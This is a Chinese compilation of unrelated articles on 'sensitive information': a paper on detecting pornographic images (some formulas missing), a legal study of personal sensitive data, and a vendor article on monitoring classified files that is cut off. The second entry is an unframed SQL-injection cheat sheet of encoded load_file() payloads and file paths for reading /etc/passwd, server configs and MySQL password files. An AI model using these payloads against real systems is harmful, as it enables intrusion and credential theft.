敏感信息(共12篇)
敏感信息 篇1
0引言
网络技术的普及与Internet用户持续、快速的增加,使网络信息安全成为影响到国家安全与社会稳定的一个重要问题。各种色情、暴力、反动以及涉及国家安全保密的信息(包括图像、视频),越来越多地借助于互连网这种通信方式进行传播。从目前的情况来看,仅仅采用封锁网址的方式进行扫黄是不够的,对网络信息特别是敏感图像信息进行必要的技术监测和过滤,才能够有效地打击网络犯罪。
网络敏感信息监控是依据文本模式匹配和图像处理技术来建立网络敏感信息宏观监控体系,综合运用文本、图像处理技术,以及智能代理技术实现网络敏感信息的监测。本文所述的网络敏感图像主要是指含有色情信息的图像,提出了一个敏感图像信息识别模型。该模型综合使用肤色模型匹配、纹理判别和SVM分类技术对敏感图片进行识别,能识别网络传输的图片,判断其中是否含有色情内容,以减少和杜绝色情图像在网络上传播的机会。
1敏感图像信息识别模型
敏感图像的识别是通过对图片的内容进行分析来实现的。图像识别与指纹识别有所不同,由于图片本身的背景条件比较复杂,人体的表现形式也具有多样性,很难与指纹模型一样用一个单一的模型把所有的特征表示出来。
敏感图像多种多样,其最明显的特征就是有裸露的肌肤。因而进行敏感图片识别就可以从皮肤区域的特点进行处理。我们先对图像进行皮肤颜色模型匹配,检测出一幅图像中的皮肤区域。接着对图像使用小波分解和灰度共生矩阵提取进行纹理判别,以区分大部分和皮肤相近的区域,然后对输出的二值图像进行处理判断。最后再用SVM进一步分类考察,最后确定图片是否含有色情信息。图片信息识别模型决策图如图1所示。
1.1肤色模型匹配
1996年Fleck[5]等就利用计算机视觉和图像理解技术对色情图片识别进行了研究,通过对图片肤色分割和人体姿态的几何特征检测来判别图片中是否含有色情信息。目前肤色模型已经广泛应用于人及其局部特征的识别。
RGB是最常用的颜色系统,也是十分可靠的表达肤色信息的色彩空间。人脸的肤色在RGB色彩空间上一般分布于R[1 51,255]、G[97,239]、B[84,233]的区间,但人的肤色在RGB空间中的分布非常广泛,直接在RGB空间中进行处理难以达到从图像中抽取人体肤色区域的目的。本文将肤色在HUV和KL颜色空间中作分割处理。
YUV表示法中Y分量表示颜色的亮度信息,U和V两个相互正交的分量表示彩色信息。色度信号是一个二维矢量,称为色度信号矢量。每个颜色对应1个色度信号矢量,它的饱和度由Ch表示,色调由相位角θ表示。
彩色图像的像素P由RGB空间变换到YUV空间用数学表示为:
θ=tan-1(|U|/|V|)
在YUV空间UV平面上,肤色的色调介于红与黄之间,根据对大量图像的彩色分析,可以确定人的肤色色调θ的变化范围,如果满足条件:θp∈[100,150],则P是肤色点。该肤色模型能够有效地提取肤色区域,但是该模型也会把一些与人的肤色比较接近的其它区域当作肤色区域。
KL变换是建立一个肤色坐标变换以进行肤色判断。彩色图像的像素P由RGB空间变换到KL空间的坐标表示为:
然后再根据下面的阈值进行判断:
110.2<K1<376.3
-61.3<K2<32.9
-18.8<K3<19.5
在该范围内的置1,否则置0,从而得到过滤肤色的二值图像。KL寻找了一个合适的色系坐标系,具有集中肤色信息的作用。KL变换和YUV空间相结合,可以弥补两种方法的不足,能更好地分割出图像中的肤色区域。变换到YUV空间能将亮度信息与色彩信息分离;KL变换能减小每个分量的均方差,从而压缩阈值范围;将两者相结合,可以进一步缩小单纯使用KL变换的阈值范围,使肤色分布范围更加集中,增加最后肤色分割的成功率。
仅用肤色模型匹配方法对图像识别的过程中,对含有色情信息的图像有较高的正检率(判定其为敏感图像),但是也覆盖了较多的具有特定颜色以及特殊光照的非色情图像。因为肤色和非肤色空间本身是相互覆盖的,肤色过滤阶段出来的区域有一部分并不是需要找的肤色区域,只是在颜色上与皮肤很接近,我们还需要对此进行纹理判别,因为非肤色区域从纹理上讲并没有肤色区域一般光滑。
1.2纹理判别
纹理通常定义为图像的某种局部性质,或者说是对局部区域中像素之间关系的一种度量,纹理特征可用来对图像中的空间信息进行一定程度的定量描述。皮肤的纹理作为一种特殊的纹理,没有明显的纹理基元,无明显的周期性和方向性。一种纹理特征提取的有效方法就是以灰度共生矩阵为基础的。
灰度共生矩阵是建立在估计二阶组合条件概率函数基础上的纹理分析方法,反映的是图像关于方向、相邻间隔以及变化幅度的综合信息,描述了某方向上间隔一定距离的一对图像点灰度出现的统计规律。分析灰度共生矩阵就可以分析图像的局部模式和排列规则,也可以从中提取出很多图像的纹理特征,比如二阶矩、相关、对比度、方差、逆方差和熵等信息。通过灰度值等相关信息作为判定规则可以判断某一区域是否为皮肤区域。
为了减少灰度共生矩阵生成的复杂度并提高图像信息的识别程度,在此之前先使用小波变换对图像进行预处理。小波变换具有多尺度特征表达能力,能将图像的大部分能量集中到最低分辨率子图像。同时,小波分析方法提取的图像的特征矢量具有维数少的优点。
小波变换是一个常用的图像分析手段,并且在纹理识别中有较多的应用[6]。与傅里叶变换相似,小波变换是一种同时具有时—频二维分辨率的变换,其优于傅氏变换之处在于它具有时域和频域“变焦距”特性,十分有利于信号的精细分析。小波变换的另外一个重要优点就是小波分解和重构算法是循环使用的,易于硬件实现。
一个二维小波变换可以看作两个连续的一维小波变换。小波变换的结果取决于所采用的小波基的类型,而小波基是由滤波器的类型决定的。本文采用Daubechies-4小波。对一幅图像进行小波分解,得到一系列的小波系数,把分解出来的子图像称为小波分解通道。当图像在某一频率和方向下具有较明显的纹理特征时,与之对应的小波通道的输出就具有高能量。
经过肤色模型匹配以及纹理判别这两步操作以后,输出的是一幅二值图像,这时可对该二值图像进行处理和判别,也就是说对连续区域位置和皮肤区域所占比例的设置和判别,以判断该图像是否该划分为敏感图像。
1.3SVM分类判别
SVM在解决小样本、非线性及高维模式识别问题中表现出很多特有的优点。模型最后用SVM来进一步对色情和非色情图片进行分类考察,最后确定图片是否含有敏感信息。
SVM是一种以统计学习理论为基础的机器学习方法,它通过核函数将输入的样本映射到高维特征空间,然后构造“有敏感信息”和“没有敏感信息”的最优分类超平面,从而达到最大的泛化能力。作者以灰度共生矩阵参数和一些像素信息作为SVM的输入进行训练和测试,以达到分类的目的。
2模型分析
本文提出的敏感图像信息识别模型实现了对网络敏感信息的监控,模型对含有色情信息的图片的取真率比较高。模型具有学习功能,在经过一些小样本的尝试学习后,能达到一定正检率。本文在该模型基础上建立了一个含有5000副图像的小样本图库,其中包括640幅色情图像和4360幅正常图像(风景、建筑、人物和动植物图像)。实验结果正检率(敏感图像正确识别的概率)、误检率(正常图像被判定为敏感图像的概率)如表1所示。
3结束语
网络敏感图像识别技术是一项具有应用价值和研究价值的技术,本文提出了一个基于肤色匹配和纹理识别的图像信息识别模型。针对网络上敏感信息泛滥的情况,该模型可在网络敏感信息监控系统基础上自动对敏感图像信息进行检测和监控,适合在网络环境下使用。进一步要做的工作是提高识别和分类精度,以及提高对大量图像的识别应用中的效率,可考虑采用多个SVM分类组合方法。
参考文献
[1]段立娟,包振山,毛国君.多特征特定类型图像过滤方法.北京工业大学学报,2005,31(4):352-356.
[2]Daubechies I.Ten lecture on Wavelets.Philadelphies:Capital city Press,1992.
[3]尹显东,唐丹,邓君,等.基于内容的特定图像过滤方法.计算机测量与控制,2004,12(3):283-286.
[4]何江平,文俊浩,邓恬洁,等.基于支持向量机的图像识别.重庆大学学报:自然科学版,2006,29(1):57-60.
[5]Fleck MM,Forsyth DA,Bregler C.Finding naked people[A].In:Pro-ceedings of the4th European Conference on Computer Vision,Cam-bridge,UK,1996,2:593-602.
[6]Reed T,Hans J M De Buf.A Review of Recent Texture Segmentation And Feature Extraction Techniques.CVGIP:Image Understanding,1993,57:359-372.
敏感信息 篇2
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
5、c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf查看WINDOWS系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:APACHEApache2confhttpd.conf
9、C:Program Filesmysqlmy.ini
10、../themes/darkblue_orange/layout.inc.phpphpmyadmin 爆路径
11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、 usr/local/app/php5 b/php.iniPHP 的相当设置
17 、/etc/my.cnfMYSQL的配置文件
18、 /etc/redhat-release红帽子的系统版本
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5 b/php.ini //PHP相关设置
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
23、c:Program FilesRhinoSoft.comServ-UServUDaemon.ini
个人敏感信息的法律规制探析 篇3
[关键词]个人信息;敏感信息;个人信息保护法
[中图分类号]G20 [文献标识码]A [文章编号]1008-0821(2010)05-0024-04
Probe Into the Legal Regulation to the Personal Sensitive InformationWang Quansheng Fang Liping
(Department of Law,Shandong University at Weihai,Waihai 264209,China)
[Abstract]Personal sensitive information is thought as such information which is endowed with special risks and need to be especially protected.The body to collect and deal with the personal sensitive information need to comply with some special principles and conditions such as the principle of agree by oneself,the principle of equalizing the interests,the principle of personal involvement,the principle of responsibility.China should stipulate the“personal sensitive information”in the law of protecting personal information.
[Keywords]personal information;sensitive information;the law of protecting personal information
1 个人敏感信息的范围
“个人信息是用来直接或间接识别自然人情况的数据资料”[1]。个人敏感信息是被认为具有特殊风险,从而通常受到特殊保护的个人信息。将个人信息划分为个人一般信息与敏感信息(特殊信息,特殊数据)是欧盟及其所属各国的立法特色。我们且不论它是依据什么标准将个人信息作出了这样的划分,我们需要考察是欧盟及其所属各国立法中如何界定“个人敏感信息”的范围。
1981年1月28日欧洲理事会通过的《有关个人数据自动化处理的个人保护协定》中第6条(数据的特殊类型)规定:“除非国内法已提供了适当的保护措施,禁止对揭示以下内容的个人数据进行自动化处理:人种、政治主张、宗教或其他信仰以及与健康或性生活有关的个人数据。与刑事判决有关的个人数据,也不应当被自动化处理。”
1995年欧盟通过的《个人数据保护指南》第8条第1款规定:“各成员国应禁止处理显示种族或民族起源、政治观点、宗教或哲学信仰和工会资格的数据,并禁止对有关健康和性生活有关的数据进行处理。”
1999年《奥地利联邦个人数据保护法》在第一章第四节对“敏感数据”范围进行了界定,它认为敏感数据是法律上值得特殊保护的数据,包括:与自然人有关,涉及他们的种族或伦理起源、政治观点、商会身份、宗教或哲学信仰的数据,以及关涉健康或性生活的数据。
《保加利亚个人数据保护法》则将“个人敏感数据”归结为:涉及种族、政治观点、宗教哲学信仰、参加政治团体、商会、宗教、哲学、政治或劳工组织的情况以及涉及健康状况、性生活的个人数据。
欧盟各国中对“个人敏感数据”规定最为全面与细致的当是《冰岛有关个人数据的保护法》。它将“个人敏感数据”概括为以下5个方面:
(1)揭示个人的人种或种族、肤色、政治立场、宗教信仰以及其他信仰的数据;
(2)揭示个人是否是犯罪嫌疑人、被告或罪犯的数据;
(3)健康数据:包括基因数据、揭示任何药品或酒精的医疗或非医疗用途的数据;
(4)有关性生活的数据;
(5)有关工会成员资格的数据。
从欧盟及其各国的立法来看,有两个共性的特点:一是都通过列举的方式将个人敏感信息范围确定下来;二是各国关于个人敏感信息的规定都有相似的地方。
实际上,作为立法中常用的技术与方法,对“个人敏感信息”作出列举是有必要的。但是我们也要知道,“个人敏感信息”可能在不同的国家不同的时代会有不同的范围,比如说涉及政治立场的个人数据,在一些国家并不认同为个人敏感数据。我国制定个人信息保护法应当吸收欧盟国家的一些共同作法,并根据我国的国情对“个人敏感信息”的范围作出如下规定:
(1)有关人种、种族、宗教信仰的个人数据;
(2)关于个人违法、犯罪等方面的数据;
(3)能根据资料识别的个人医疗数据;
(4)有关性生活的数据;
(5)其他各种对个人会造成人身财产重大损害的个人数据。
前四个方面涉及到欧盟及各国的共同做法,后一个方面实际上涉及到对个人信息的划分问题,根据一般的理解,将个人信息区分为一般个人信息和特殊个人信息,一个重要的标准即是看这种个人数据对个人人身财产利益的损害程度。考虑这一点,立法上既采取一种能列举的尽量列举,不能列举的设置一个原则规定,随着社会的发展、人的认识水平的提高等,立法者甚至执法者、司法者可以对其加以灵活变通的解释。
2010年5月第30卷第5期个人敏感信息的法律规制探析May,2010Vol30 No52 个人敏感信息的征集与处理的原则
一般来说,从现行很多国家的立法来看,对个人敏感信息原则上是禁止征集与处理的。欧洲理事会《有关个人数据自动化处理的个人保护协定》规定,除非国内法已提供了适当的保护措施,禁止对个人敏感信息进行自动化处理;奥地利等国家立法中规定在保护数据主体隐私利益的前提下,可以对个人敏感信息进行征集处理。因此,在能够确保数据主体隐私利益的前提下,可以对个人敏感信息根据法律的规定进行征集与处理。
实际上,立法上可以采取对个人信息处理一般原则作出规定,在涉及到个人敏感信息处理的特别原则时,应就特别原则作出规定。也就是说,对个人信息处理的一般原则也适合于个人敏感信息征集与处理的原则。然后针对个人敏感信息征集与处理的特别原则再作出规定。
关于个人信息征集与处理的一般原则各国立法的规定都大同小异,都在某种程度上参照了经济合作与发展组织(OECD)《关天隐私保护与个人数据跨疆界流动的指导原则》的规定,它规定的八项原则成为各国个人信息立法的范本。
这八项原则是:(1)收集限制原则。即个人信息的收集应通过合法与正当的方式,并在一定条件下要经由数据主体的同意或默示;(2)数据质量原则。个人数据应该与它们将要使用的目的和该目的必要的程度相关,个人数据应保持精确、完整与最新状态;(3)列明目的原则。个人数据征集的目的应当在征集之前列明。(4)使用限制原则。个人数据不应该被披露和公开使用,除非在数据主体同意以及法律授权情况下才能公开;(5)安全保护原则。该原则是指“个人资料应采取合理的安全保护措施,以防止资料的丢失、非法接触、毁损、利用、修改和揭露等危险的发生。”[2]。(6)公开原则。数据主体有权了解个人数据的存在与性质、使用目的以及数据控制者的身份与通常住所;(7)个人参与原则。数据主体有权知晓或获得数据控制者是否拥有有关他的数据,数据主体应允许在合理的时间以合理的方式取得有关他自己的数据等;(8)责任原则。“滥用或使用不实的信息主体的信息导致信息主体的权利受损害时,应依法承担法律责任。[3]”数据控制者有责任遵守赋予以上八原则以效力的措施。
对于个人敏感信息征集与处理的特别原则,根据各国的立法来看,有以下方面:
21 本人同意原则
各国个人数据保护法中关于个人敏感信息征集与处理的原则中都要求数据主体明确表示同意。如《冰岛有关个人数据的保护法》规定:“数据主体已同意处理”。《奥地利联邦个人数据保护法》则规定“数据所有人明确将数据亲自公布。”一般来说,对于个人敏感信息的征集与处理需要数据主体的明确同意。在数据主体不知情、不同意的情况,不能对个人敏感信息进行征集与处理。
22 从数据主体及其代理人处获得个人敏感信息的原则各国也对征集个人敏感信息的来源作出规定,征集个人敏感信息必须从数据主体自身征集。如《冰岛有关个人数据的保护法》规定:“处理只与数据主体本人已经公布的数据相关。”从他人手里获取个人敏感信息都是不允许的。
23 利益衡平原则
对个人敏感信息的征集与处理要考虑到不同利益的平衡,如个人利益与公共利益、本人利益与他人利益的平衡。如《冰岛有关个人数据的保护法》规定:“处理是基于医疗目的或为了实施公共健康领域的常规管理而必须采取的行为,并且该处理应由遵守保密任务之卫生保健系统的人员实施。”“处理是为进行统计或科学研究而必须实施的行为。”《奥地利联邦个人数据保护法》也规定:“在法律服务于一项重要的公共利益的范围内,使用数据的义务或授权是由法律规定的。”数据的使用是“为了第三方的重大利益。”
3 个人敏感信息征集与处理的基本条件
虽然各国原则上规定对个人敏感信息禁止征集与处理,但是它又规定了例外,在符合某些条件时,各国立法又规定可以对个人敏感信息进行征集与处理。
最早规定“个人敏感信息”的欧洲理事会《有关个人数据自动化处理的个人保护协定》中原则上就规定禁止对个人敏感信息进行征集与处理,但是它又规定3种情形下,可以对个人敏感信息进行征集与处理:(1)保护国家安全、公共安全、国家的财政利益或抑制刑事犯罪;(2)保护数据主体或他人的权利和自由;(3)如果明显不存在对数据主体隐私的侵害危险,则可以在与为统计或科研目的而进行的处理。
1995年欧盟《个人数据保护指南》则将个人敏感信息的征集与处理的条件规定更为具体化一些,从而为欧盟各国的立法奠定了坚实基础。在该指南中,它规定了以下7种情形可以对个人敏感信息进行征集与处理:
(1)数据主体明确表示同意处理这些数据;
(2)处理对于管理者在就业法范围内行使其义务和特殊的权利是必要的,但限于就足够的保护措施给予规定的国家法律的授权范围;
(3)如果数据主体在身体或法律上无法表示同意,但是处理对于保护数据主体或其他人的重大利益是必要的;
(4)处理是在基金会、组织或其他非营利性机构出于政治、哲学、宗教或工会目的具有足够保障的活动中进行的,条件是该处理只涉及该机构的成员或与该机构签订有关其目的的例行合同的人,而且未得到数据主体的同意,不得向第三方公开这些数据;
(5)处理所涉及的数据明显是由数据主体所公开的或该处理对于提出、行使或保护合法要求是必要的;
(6)如果出于预防医学、医疗诊断、提供护理和治疗或保健服务管理的目的而提出对数据进行处理的要求;
(7)如果是卫生专业部门在国家法律或国家管理机构制定的法规下,出于其专业保密的义务而进行的数据处理,或是其他人由于同样的保密义务而进行的处理。
其后奥地利《联邦个人数据保护法》规定了13种情形下以个人敏感信息的收集,与欧盟规定相比,它增加了如:在法律服务于一项重要的公共利益的范围内,使用数据的义务或授权的法律规定的;是公共部门的管理员履行其提供的部门间协助义务时实施的;数据的使用仅仅涉及到由数据所有人行使的一项公共职务等。其他欧盟国家如比利时、冰岛、丹麦、荷兰、瑞典等国家也都规定了类型的情形。
虽然欧盟各国的规定基本上遵守了欧洲理事会以及欧盟的规定,但是因为国情的不同,也有一些细微的差异。考虑到我国的国情状况,可以适当吸纳欧盟各国的原则规定,又可以根据我国的实际情况对某些规定加以改变,比如说涉及到政治、哲学、工会等目的个人敏感信息在我国一般不存在或不被认为是个人敏感信息。
借鉴欧盟及其所属各国的立法,在我国《个人信息保护法》中,可以考虑设置对个人敏感信息的征集与处理的具体条件,在满足以下一种或多种条件下,有关数据征集与处理主体可以个人敏感信息进行征集与处理:
(1)个人敏感信息的主体明确以书面方式授权或同意;
(2)对个人敏感信息的征集与处理是为了数据主体重大的利益或第三方的重大利益;
(3)政府机关根据国家法律法规的规定,对个人敏感信息的征集与处理,但仅限于公务行使的目的与适当的范围;
(4)数据主体已公开的个人敏感信息,但仅以其公开的范围为限;
(5)个人敏感信息的处理是为了在诉讼中提出主张或针对诉讼主张提出抗辩的必需行为;
(6)处理是基本医疗目的或为了公共健康领域的常规管理而必须采取的行为,并且该处理应由遵守保密义务之卫生保健部门的人员实施;
(7)处理是为进行统计或科学研究而必须实施的行为;
(8)其他因法律规定或重大利益考虑而采取的个人敏感信息的征集与处理行为。
4 我国个人信息保护法关于“个人敏感信息”的立法选择从现有相关个人信息保护法的国家来看,关于个人敏感信息的法律规定有两种类型:一是在立法中对“个人敏感信息”的范围及征集与处理条件作出明确规定,即有关于个人敏感信息的规定,这以欧盟及其所属国家为典型;二是没有区分个人一般信息与个人敏感信息,在立法中只是对个人信息作出规定,立法中没有采用“个人敏感信息”的概念。这在经济发展与合作组织、美国、日本、韩国等国家的个人信息保护法中体现很明显。
为什么在立法中不采用“个人敏感信息”概念?经济合作组织在解释性备忘录中对此进行了说明:“有人可能主张说,列举本质上敏感的数据种类和范畴既是可能的,也是必须的,对此种数据的收集应当受到限制甚或禁止。在欧洲的立法中存在类似的先例(如种族、宗教信仰、犯罪记录),另一方面,也可以认为,任何数据本质上都不是“私人的”或“敏感的”,但是,它们可能在特定的语境下和在被放置到不同的用途中时变成“私人的”或“敏感的”。例如,这种观点反映在美国的隐私立法中。专家团讨论了许多敏感标准,如差别待遇的风险,但是,它并不认为,给那些通常被认为是敏感的数据下定义是可能的,因此,在第七段仅包含一个应当限制个人数据收集的普遍阐述。[4]”
我国《个人信息保护法》已提上立法日程,2003年年初,国务院信息办委托中国社会科学院法学研究所以周汉华研究员为负责人的个人数据保护法研究课题组承担《个人数据保护法》比较研究及草拟一份专家建议稿。经过几年的时间,该专家建议稿已经起草完成。
在《个人信息保护法》专家建议稿中没有对“个人敏感信息”作出规定。该专家组认为,“尽管在我国确实有必要加强对某些敏感个人信息的保护(如传染病人、艾滋病患者),但是,在个人信息保护法中不宜采用敏感个人信息概念。”为什么呢,他们提出了3个方面的理由:“(1)域外立法中的敏感信息概念含义非常广泛,包括了政治权利、宗教信仰、结社自由、健康、性生活与司法公正等许多方面。在我国,由于国情的不同……,如果采用含义广泛的敏感个人信息概念,会导致个人信息保护法与我国宪法和根本政治制度的冲突。(2)对于我国实际生活中各个方面收集个人信息过多,甚至收集直接涉及类似个人健康、医疗信息的问题,完全可以通过单行立法来解决,没有必要一定要在个人信息保护法中规定敏感个人信息》……(3)不采用敏感个人信息概念,在域外立法中也是一种比较常见的选择。[5]”
作者认为,我国既然要制定第一部个人信息保护方面的法律,应当借鉴欧盟及其所属各国的立法模式,对“个人敏感信息”作出规制。
41 个人信息中可以通过技术与标准区分为“个人一般信息与个人敏感信息”,对个人敏感信息的范围作出界定是可能的而且是必要的其可能性在于,从世界上现有个人信息保护的国家来看,实际上对个人敏感信息作出规定的国家数量比没有作出规定的国家在数量上要多得多,而且在影响上也要大。欧盟及其各国对“个人敏感信息”范围作出规定就是基于一定的标准与技术作出来,而且是就目前的认识水平来讲是较为合理的;其必要性在于:个人敏感信息是客观存在的,就连我国起草《个人信息保护法》的专家也都承认,一些信息(如传染病人、艾滋病患者)确实属于个人敏感信息,有特别保护的必要。至于专家组认为域外的个人敏感信息概念过于宽泛,如果吸纳这些观念,可能与我国宪法和根本政治制度相冲突,这个问题可以完全避免,一个国家的国情及性质,不可能要照搬照抄别国的立法,可以根据自己的国情与性质作出特别的规定,范围可以小于也可以大于其他一些国家的规定。从我国当前的立法选择来看,可以考虑结合各国规定的共性方面作出规定。
42 现实中对个人信息收集与处理已出现了一些问题,尤其是对个人敏感信息的征集与处理涉及到数据主体的隐私与安全,需要针对不同性质的个人信息作出规定我国到目前为止没有一部相关的个人信息保护方面的完整法律,仅有一些零散的规定,这不利于个人信息尤其是个人敏感信息的保护。有专家建议可以采用单行法的形式对个人敏感信息作出规定,这一方面增加立法成本不说,另一方面也可能涉及对个人信息全面保护的缺乏。既然要制定个人信息保护方面的专门法律,有必要对该法所能涉及的问题,需要规制的问题都有所规定,借鉴其他国家的成熟做法,我们可以制定一个全面的、完整的、可操作性强的个人信息保护法。
43 域外立法中采用“个人敏感信息”的规定居多
虽然欧洲理事会《有关个人数据自动化处理的个人保护协定》、欧盟《1995年个人数据保护指南》成为欧盟各国立法的指南与范本,同时“欧盟的规定……成为了一个国际问题,也使欧盟之外的其他许多国家在立法中纷纷效仿。[5]”另外,欧盟及其所属各国关于个人信息保护方面的法律制定得比较早,有些国家还做了一些修改,条款内容也逐渐成熟。我国在这方面的立法刚刚起步,为尽快弥补这个缺憾,需要制定一个完善的包括“个人敏感信息”规定的个人信息保护法非常有必要。
44 经济全球化的发展以及各国国际合作的加强,一个国家吸纳别国的先进立法成果已成必然趋势一个国家的发展有快慢先后,立法也经历不同的过程,为更好的促进国际合作,更好履行我国加入的国际条约与协定的义务(比如加入世贸组织承诺的“透明原则”),也需要制定出与各国立法共同性比较接近的相关法律。同时,社会经济的发展,人员、信息等生产要素在全球范围内自由流通,这是一国经济得以高速发展的重要前提,跨境数据流动既是对主权国家的挑战也是机遇[6]。因此,在制定《个人信息保护法》这个问题上,宜将“个人敏感信息”问题作一个较为全面、详细、操作性强的规定,以适应我国经济发展与国际交往的需要。
参考文献
[1]汪全胜.试论网络隐私权的立法保护[J].情报杂志,2005,(1):6-9.
[2]齐爱民.个人资料保护法原理及其跨国流通法律问题研究[M].武汉:武汉大学出版社,2004:104.
[3]汪全胜.政府获取个人数据的权利及其限制[J].情报理论与实践,2005,29(5):520-523.
[4]周汉华.域外个人数据保护法汇编[M].北京:法律出版社,2006:27.
[5]周汉华.个人信息保护法(专家建议稿)及立法研究报告[M].北京:法律出版社,2006:79-80,88-89.
敏感信息监控管理的技术发展趋势 篇4
以往,各党政单位都采用保密检查的方式来发现违规存储涉密文件的行为。保密检查系统的发展分为两个阶段:
第一阶段,保密管理人员采用单机版检查工具定期对计算机进行逐台检查,检查效率很低,面对庞大的网络信息系统,仅依靠人数有限的保密管理人员对计算机逐台进行保密检查是不现实的,也是不可靠的,最终只能做到重点抽查。
第二阶段,采用网络版保密检查系统,借助网络化优势,实现一次性全网检查,极大提高了检查效率。网络化保密检查虽然提高了效率,但仍然存在如下重要弊端无法解决:
(1)网络化保密检查系统只能采取定期检查的方式,永远只能检查计算机中文件存储的当前状态,两次检查中间发生的违规行为无法被系统检查到。如果工作人员在两次检查中间在内部工作网和互联网计算机中处理涉密文件,处理完后将文件清除,那么系统无法及时发现这种保密违规行为。
(2)网络化保密检查系统采用全盘扫描的方式进行检查,耗费大量时间和系统资源,大部分都是无意义的重复工作。比如:一台计算机中存储1万份文档,但大部分文档都是备份存档用的,日常根本不会处理、修改和更新,用户每天只处理少数几份文档。但是,网络化保密检查系统每次都需要对这些根本没有改变过的文档进行重新扫描,是对计算机资源的严重浪费。
(3)网络化保密检查系统针对同一份文档的不同存储备份没有智能的处理方法。计算机实际使用过程中,完全相同的一份文档可能在同一台计算机的不同目录下存有备份;在网络化办公的时代,完全相同的文档也可能在大量计算机中均有备份。现有的网络化保密检查系统从设计理念上就无法解决重复数据剔除的问题。每次检查,同一份文档因为其所在的存储位置不同,会产生多份违规存储报警信息,造成保密管理员重复工作量大大增加。
(4)网络化保密检查系统不具备自学习的功能。因为计算机智能语义分析技术还没有发展到能根据一份文件的内容就能分析出其涉密的程度,部分疑似涉密文件需要辅助人工鉴别最终确定其是否涉密以及涉密程度。现有的网络化保密检查系统从设计根基上就决定了需要保密管理员一遍一遍的进行人工鉴别,而且在以前的保密检查过程中已经做过人工鉴别的文件,系统无法自学习并形成知识和经验,下次检查还要做重复的工作。比如:上一次保密检查上报的疑似涉密文件,经保密管理员鉴别为非涉密文件,但是下一次保密检查,该文件还会作为疑似涉密文件上报,需要保密管理员重新鉴别;如果一份上报的疑似涉密文件经保密管理员鉴别为涉密文件,如果这份文件在不同的计算机中或在同一计算机的不同目录中出现,那么每出现一份,需要保密管理人员重新鉴别一次。
(5)对于一份已经被确定为涉密的文件,现有的网络化保密检查系统无法跟踪这份文件的动态变化和生命周期,无法监控该文件是否被重新修改、是否已经被删除、是否被复制到其它的地方等,而对违规存储的涉密文件的处理情况进行全程跟踪是保密管理员最关心的问题,也是切实保证涉密文件被及时清除的手段,只有这样才能有效防止泄密。
综上所述,现有的保密检查系统虽然可以纠正部分违规存储涉密文件的行为,但是存在严重的滞后性并可被有意规避,无法做到对违规存储涉密文件的行为进行全面、统一、实时、动态的监控管理和处理结果跟踪。
1 敏感信息监控管理系统的功能及优势
针对现有保密检查系统存在的上述重要弊端,万里红公司在理念、思路和技术上进行全面创新,设计开发了第三代敏感信息监控管理系统,实现对每一台接入网络的计算机中存储的文件进行实时动态地监控,对违规存储涉密文件的行为实时发现、实时上报、及时处理,极大提高了保密管理工作效率,为减少内部工作网和互联网计算机中的保密违规行为提供了高效的技术手段。
1.1 系统主要功能
敏感信息监控管理系统采用全文检索技术、文件密级智能分析技术及文件系统动态监控技术,对计算机中违规存储涉密文件的行为进行实时、动态的监控,将违规存储涉密文件的行为自动上报至监控中心。保密管理员对违规报警信息进行统计分析,随时了解管理范围内的计算机中出现的保密违规行为,对保密违规行为进行警告、处理、教育,并可对违规存储的涉密文件进行清除和处理状态跟踪。
敏感信息监控管理系统支持在大型复杂网络上进行分级部署和分级管理,监控策略可以逐级下发,监控结果可以分级汇总,逐级上报。通过本系统可以实现对内部工作网和互联网计算机中违规存储涉密文件的行为进行一体化的监控管理,可以通过保密违规行为在各地区的分布情况对各级保密管理员的工作进行有效评价和考核,切实做到把保密技术防护与保密管理工作考核及评价进行有效的结合,形成综合的保密技术防护及保密管理平台。
在敏感信息监控管理系统的支撑下,保密管理员可通过可视化查询和统计功能,随时了解自己管理范围内出现的涉密文件违规存储的情况及分布情况,及时对违规行为进行审查、督促、整改和教育,确保接入网络的所有计算机上都不违规存储涉密文件,减少泄密风险,提升保密技术防范水平和保密管理水平。
1.2 系统主要优势
1.2.1 实时动态监控涉密文件违规存储情况
系统能够实时监控计算机的文件系统变化,捕捉那些新建的文件和进行修改更新的文件,分析上述文件的内容并对其是否涉密进行评估,根据预先设定的违规报警触发策略产生报警信息。通过实时动态监控文件系统变化,保证了发现违规存储涉密文件的及时性,根本解决了以往网络化保密检查系统存在的两次保密检查之间文件存储情况不可控的问题,计算机使用者无法绕过系统的监控。
实时动态监控技术还将大量减少对文件内容进行分析扫描的工作量,显著减少对系统资源的消耗。对计算机中存储的大量文件,只需在系统安装后进行一次全盘扫描和分析,之后,系统只对计算机中新增的文件或正在进行修改的文件进行内容分析和是否涉密的评估。系统采用文件内容索引技术与文件系统动态监控技术相结合,实现对涉密文件的快速发现和增量提交,平衡了涉密文件发现的及时性和全面性,大量减少对系统资源的消耗和保密管理员的工作量。
1.2.2 涉密文件鉴别智能自学习技术
